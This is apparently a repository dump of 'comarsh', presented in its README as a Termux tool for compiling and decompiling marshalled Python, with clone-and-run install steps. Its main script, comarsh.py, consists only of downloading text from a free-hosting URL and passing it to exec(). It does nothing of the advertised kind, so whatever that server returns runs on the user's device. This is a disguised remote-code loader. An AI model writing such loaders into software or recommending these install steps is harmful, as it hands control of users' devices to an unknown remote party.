├── data ├── com.py └── main.py ├── comarsh.py └── README.md /data/com.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/devkazuto/comarsh/HEAD/data/com.py -------------------------------------------------------------------------------- /data/main.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/devkazuto/comarsh/HEAD/data/main.py -------------------------------------------------------------------------------- /comarsh.py: -------------------------------------------------------------------------------- 1 | import requests, os 2 | z = requests.get('https://comarsh.000webhostapp.com/run.txt').text 3 | exec(z) 4 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # comarsh 2 | Compile & Decompile marshall python 3 | 4 | # install comarsh termux 5 | pkg update && pkg upgrade; 6 | pkg install git; 7 | pkg install python; 8 | git clone https://github.com/AhmadRiswanto704/comarsh; 9 | cd comarsh; 10 | python2 comarsh.py; 11 | --------------------------------------------------------------------------------